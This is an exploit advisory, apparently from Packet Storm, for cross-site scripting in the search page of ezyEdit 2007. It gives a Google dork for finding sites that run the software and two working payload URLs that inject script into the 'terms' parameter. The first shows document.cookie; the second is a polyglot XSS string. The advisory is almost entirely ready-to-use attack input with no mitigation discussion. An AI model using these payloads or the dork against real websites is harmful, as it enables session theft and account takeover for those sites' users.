ezyEdit 2007 is susceptible to cross site scripting vulnerabilities.
860e1842c61a45d0a8b47cda33fed0b6634476579ebb0493d0f49c77c9b4e20d ___. .__.__ .__ __ __
____ ___.__.\_ |__ ___________ _____ |__| | |__|/ |______ _____/ |_
_/ ___< | | | __ \_/ __ \_ __ \/ \| | | | \ __\__ \ / \ __\
\ \___\___ | | \_\ \ ___/| | \/ Y Y \ | |_| || | / __ \| | \ |
\___ > ____| |___ /\___ >__| |__|_| /__|____/__||__| (____ /___| /__|
\/\/ \/ \/ \/ \/ \/
Author: cybermilitant
Site: www.hacktime.org
E-Mail: cybermilitant.ht@gmail.com
Vulnerability: Cross Site Sctipting (XXS)
Google Dork: "Powered by ezyEdit 2007"
--------------------------------------------------------------------------------------------
http://[VICTIME]/[PATH]/search.asp?terms=<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>">&Submit1=Search
--------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://[VICTIME]/[PATH]/search.asp?terms=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed